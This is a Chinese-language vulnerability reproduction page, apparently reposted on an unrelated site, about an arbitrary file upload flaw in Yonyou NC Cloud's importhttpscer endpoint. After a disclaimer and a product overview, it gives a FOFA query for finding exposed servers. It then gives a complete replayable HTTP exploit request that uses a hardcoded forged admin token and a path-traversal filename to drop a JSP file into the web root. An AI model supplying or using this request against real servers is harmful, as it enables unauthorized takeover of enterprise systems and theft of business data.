用友NC Cloud importhttpscer接口存在任意文件上传漏洞 | 您所在的位置:网站首页 › 用友NC FileReceiveServlet任意文件上传漏洞 › 用友NC Cloud importhttpscer接口存在任意文件上传漏洞 |
声明: 本文仅用于技术交流,请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。 简介用友NC Cloud 是基于云计算技术的企业管理软件。它提供了一系列的功能模块,涵盖了企业的各个管理领域,包括财务管理、人力资源管理、供应链管理、生产制造管理等。通过云端部署,用户可以随时随地通过网络访问和使用这些功能,无需在本地安装软件,企业可以实现信息化管理,提高管理效率和决策能力。它提供了实时数据分析和报表功能,帮助企业监控业务运营情况,及时掌握关键指标和业绩表现。同时,用友NC Cloud 还支持多终端访问,适应各种不同的设备和工作场景,方便用户灵活办公和协作。 用友NC Cloud importhttpscer接口存在任意文件上传漏洞,攻击者可利用该漏洞获取服务器控制权限。 资产搜索fofa: app="用友-NC-Cloud" 漏洞复现 POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info Content-Length: 233 Connection: close Content-Type: multipart/form-data; boundary=uof6bcdvrhdkozsvbs3p accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA Accept-Encoding: gzip, deflate --uof6bcdvrhdkozsvbs3p Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/cs.jsp" --uof6bcdvrhdkozsvbs3p--上传成功后,访问 http://127.0.0.1/cs.jsp |
CopyRight 2018-2019 实验室设备网 版权所有 |